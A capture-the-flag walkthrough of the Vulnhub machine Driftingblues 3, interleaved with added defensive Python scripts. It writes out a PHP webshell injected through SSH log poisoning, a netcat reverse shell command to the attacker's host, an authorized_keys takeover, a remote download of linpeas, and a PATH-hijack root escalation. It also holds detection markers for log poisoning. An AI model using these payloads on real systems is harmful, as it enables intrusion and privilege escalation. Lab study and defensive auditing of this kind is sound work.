Vulnhub – Driftingblues 3 – Walkthrough – Writeup

Previous machine walkthrough: Vulnhub – Driftingblues 2 – Walkthrough

Link of this machine: https://www.vulnhub.com/entry/driftingblues-3,656/

Foothold

fping

fping -aqg 10.0.2.0/24 # target identified as 10.0.2.10

nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.10 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -p$ports -sC -sV 10.0.2.10

We saw some interesting entries in the nmap output. Let’s visit the link.

We found a message at the link.

man there's a problem with ssh

john said "it's poisonous!!! stay away!!!"

idk if he's mentally challenged

please find and fix it

also check /littlequeenofspades.html

your buddy, buddyG

Let’s check this new link /littlequeenofspades.html as well. The page itself shows nothing, but in its source there is a base64-encoded comment.

As you can see above, decoding it reveals another base64 string that holds the message. So, let’s take a look at the page it points to.

It looks like the logs are being displayed on that page.

As you can see, the username is also displayed on the page. If we can inject PHP code in place of the username, that results in remote code execution. For this we use PHP’s system() function: we inject into the log a snippet that takes its command from a GET parameter.

ssh '<?php system($_GET["c"]); ?>'@10.0.2.10

Now we can run any command through the URL, in the format 10.0.2.10/adminsfixit.php?c= followed by the command.
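The weakness here is a log viewer that lets the SSH log reach the PHP interpreter as code instead of treating it as data. Two things a defender wants from this page: a way to spot poisoning attempts in the auth log, and the correct way to render such a log (HTML-escaped text, never include()d). The following is an added example, not part of the original walkthrough; the log lines are constructed to look like sshd output and are not captured from the target.

```python
import re
from html import escape

# Constructed sample of sshd lines in the /var/log/auth.log style
# (made up for this example, not captured from the target).
SAMPLE_AUTH_LOG = """\
Mar 14 10:01:02 driftingblues sshd[1203]: Invalid user alice from 10.0.2.15 port 50211
Mar 14 10:01:07 driftingblues sshd[1203]: Failed password for invalid user alice from 10.0.2.15 port 50211 ssh2
Mar 14 10:02:33 driftingblues sshd[1210]: Invalid user <?php system($_GET["c"]); ?> from 10.0.2.15 port 50220
Mar 14 10:03:01 driftingblues sshd[1215]: Accepted publickey for robertj from 10.0.2.15 port 50230 ssh2
Mar 14 10:04:12 driftingblues sshd[1220]: Invalid user <?=`id`?> from 10.0.2.15 port 50240
"""

# sshd writes the attacker-controlled name between "invalid user" and "from".
USER_RE = re.compile(r"[Ii]nvalid user (?P<user>.+?) from (?P<ip>\S+)")

# Tokens that never belong in a legitimate username; any of them means
# someone is trying to smuggle server-side code into the log.
PAYLOAD_MARKERS = ("<?", "?>", "<%", "${", "`", "$(")


def parse_invalid_users(log_text):
    """Return (user, ip, raw_line) for every 'invalid user' line."""
    hits = []
    for line in log_text.splitlines():
        m = USER_RE.search(line)
        if m:
            hits.append((m.group("user"), m.group("ip"), line))
    return hits


def find_poisoning_attempts(log_text):
    """Return the entries whose logged username carries a code/template marker."""
    return [(user, ip, line) for user, ip, line in parse_invalid_users(log_text)
            if any(marker in user for marker in PAYLOAD_MARKERS)]


def render_log_safely(log_text):
    """How a web log viewer should emit the file: read it as text and HTML-escape it.
    The vulnerable page evaluated the log as PHP; escaped text inside <pre> cannot run."""
    return "<pre>" + escape(log_text) + "</pre>"


if __name__ == "__main__":
    for user, ip, _line in find_poisoning_attempts(SAMPLE_AUTH_LOG):
        print("poisoning attempt from %s: username %r" % (ip, user))
```

The detector keys on the "invalid user" lines because that is where sshd records the name exactly as the client sent it; the same markers can be fed to any SIEM rule. The render function is the whole fix on the application side: the log is data, so it is escaped and displayed, not included.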

Let’s list the files.

We got it. Now it’s simple: we have to open a reverse shell. So let’s check for nc by running which nc. It appears the server has nc. So, we listen on port 4444 on our local machine and invoke the reverse shell through the PHP file.

On the local machine:

nc -nlvp 4444

Then, from the browser on the local machine, request:

10.0.2.10/adminsfixit.php?c=nc 10.0.2.15 4444 -e /bin/bash

We got the reverse shell. Now, let’s spawn a pty shell.

which python # gave us python path
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Now, pressing Ctrl+Z sends the session to the background. Then, in our local terminal, we can set some stty options and bring the session back.

stty raw -echo;fg
reset
# type xterm if prompted for terminal type
stty columns 178 rows 98

Privilege User

ls -al /home # lists a user robertj
cd /home/robertj
ls -al # there is a user.txt file that other users cannot read
# there is also a .ssh directory

So, we can add our SSH public key to the file authorized_keys and log in as robertj over SSH. We also have to change the file’s permissions so that robertj can write to it.

cd .ssh
echo __your ssh public key__ > authorized_keys
chmod 777 authorized_keys
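What made this step possible is a .ssh directory that another account could write into, leaving an authorized_keys file owned by the wrong user and world-writable. With sshd’s default StrictModes yes such a file is refused ("bad ownership or modes"), so both conditions are worth auditing across /home. The following audit script is an added example, not part of the original walkthrough; the home tree it builds is constructed for the demo, and since ordinary users cannot chown a file, the demo only triggers the mode check, not the ownership check.

```python
import os
import stat
import tempfile


def authorized_keys_issues(home_root):
    """For every <home_root>/<account>/.ssh, report the .ssh directory and its
    authorized_keys file when they are writable by group or others, or owned by
    a uid other than the account's own. Returns a list of (path, reason)."""
    issues = []
    for account in sorted(os.listdir(home_root)):
        home = os.path.join(home_root, account)
        ssh_dir = os.path.join(home, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        owner = os.stat(home).st_uid          # the account's own uid
        for path in (ssh_dir, os.path.join(ssh_dir, "authorized_keys")):
            if not os.path.exists(path):
                continue
            st = os.stat(path)
            mode = stat.S_IMODE(st.st_mode)
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                issues.append((path, "writable by group/others (mode %04o)" % mode))
            if st.st_uid != owner:
                issues.append((path, "owned by uid %d, expected %d" % (st.st_uid, owner)))
    return issues


def build_demo_homes():
    """Constructed /home-like tree: 'robertj' gets a world-writable
    authorized_keys (as on the box), 'alice' gets the correct 0700/0600 modes."""
    root = tempfile.mkdtemp(prefix="home-audit-")
    for name, key_mode in (("robertj", 0o777), ("alice", 0o600)):
        ssh_dir = os.path.join(root, name, ".ssh")
        os.makedirs(ssh_dir)
        os.chmod(ssh_dir, 0o700)
        key_file = os.path.join(ssh_dir, "authorized_keys")
        with open(key_file, "w") as fh:
            # placeholder line, not a real public key
            fh.write("ssh-ed25519 PLACEHOLDER-PUBLIC-KEY example@host\n")
        os.chmod(key_file, key_mode)
    return root


if __name__ == "__main__":
    for path, reason in authorized_keys_issues(build_demo_homes()):
        print("%s: %s" % (path, reason))
```

Run it against the real /home as root to get a full report; on a correctly configured host the list is empty. The expected modes are 0700 for .ssh and 0600 for authorized_keys, both owned by the account itself.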

Now, let’s log in using ssh from our local machine.

ssh robertj@10.0.2.10 -i .ssh/id_rsa # the private key, usually under the .ssh folder in your home directory

We got the shell from user robertj. Let’s view the flag.

cat user.txt

Privilege Root

We will use linpeas.sh to enumerate the Linux host. It is not strictly needed: you can skip this part and use the find command given further below.

To use linpeas.sh:

On the local machine:

python3 -m http.server 8080 # linpeas.sh should be in the current directory

On the target machine:

wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.sh

Now, execute linpeas.sh and save the output to a file.

./linpeas.sh | tee output

linpeas found a binary with the SUID bit set that is owned by root, which is exactly what we are after.

Or, using the find command:

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

Let’s see what it does.

It looks like the binary calls three other commands by name rather than by absolute path. So we can put a directory we control (/tmp) at the front of PATH and place a custom executable with one of those names in it. We will begin with ip.

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

We got the root shell and we got the flag.
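The root cause is a SUID-root program that shells out to commands by bare name, so whatever PATH the caller supplies decides what actually runs. A defender can find such programs by combining the page’s find command with a strings-style scan for command names that appear without a leading slash. The following audit is an added example, not part of the original walkthrough; the fake "getinfo" it builds is a constructed blob, the list of watched commands is an assumption, and the scan is a heuristic, not a disassembly.

```python
import os
import re
import stat
import tempfile

# Command names a helper binary commonly shells out to (assumed list). A hit on a
# bare name, with no leading slash, inside a SUID-root program is a PATH-hijack candidate.
WATCHED_COMMANDS = {"ip", "netstat", "ifconfig", "cat", "ls", "ps", "id", "sh", "bash"}
WATCHED_BYTES = {c.encode() for c in WATCHED_COMMANDS}

PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{2,}")          # what strings(1) would print
SEPARATOR_RE = re.compile(rb"\s*(?:\|\||&&|;|\|)\s*")    # shell command separators


def find_suid_root(root, owner_uid=0):
    """Regular files under root with the setuid bit and owned by owner_uid,
    i.e. what 'find / -perm -4000 -user root' lists."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
                found.append(path)
    return sorted(found)


def bare_commands_in(blob):
    """Pull printable strings out of a binary, split each on shell separators, and
    return the watched commands that sit in command position without an absolute path."""
    hits = set()
    for s in PRINTABLE_RE.findall(blob):
        for segment in SEPARATOR_RE.split(s):
            words = segment.split()
            if words and words[0] in WATCHED_BYTES:
                hits.add(words[0].decode())
    return sorted(hits)


def audit_suid_binaries(root, owner_uid=0):
    """Map each SUID binary under root to the bare commands found inside it."""
    report = {}
    for path in find_suid_root(root, owner_uid):
        with open(path, "rb") as fh:
            cmds = bare_commands_in(fh.read())
        if cmds:
            report[path] = cmds
    return report


def build_demo_tree():
    """Throwaway tree with a constructed fake 'getinfo' so the audit runs offline.
    Returns (root, uid_to_audit); the uid is ours because we cannot chown to root."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    os.makedirs(os.path.join(root, "usr", "bin"))
    fake = os.path.join(root, "usr", "bin", "getinfo")
    with open(fake, "wb") as fh:
        fh.write(b"\x7fELF\x02\x01\x01\x00Usage: getinfo\x00ip a\x00netstat -tulnp\x00/usr/bin/id\x00")
    os.chmod(fake, 0o4755)          # setuid, like the real binary on the box
    harmless = os.path.join(root, "usr", "bin", "harmless")
    with open(harmless, "wb") as fh:
        fh.write(b"\x7fELF\x00ls -la\x00")
    os.chmod(harmless, 0o755)       # no setuid bit, so it is never reported
    return root, os.getuid()


if __name__ == "__main__":
    root, uid = build_demo_tree()
    for path, cmds in audit_suid_binaries(root, owner_uid=uid).items():
        print(path, "runs bare commands:", ", ".join(cmds))
```

On a real host run audit_suid_binaries("/") as root with the default owner_uid=0. Any hit is a candidate for the fix: call helpers by absolute path (or set PATH inside the program before any exec), and question whether the program needs the SUID bit at all.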
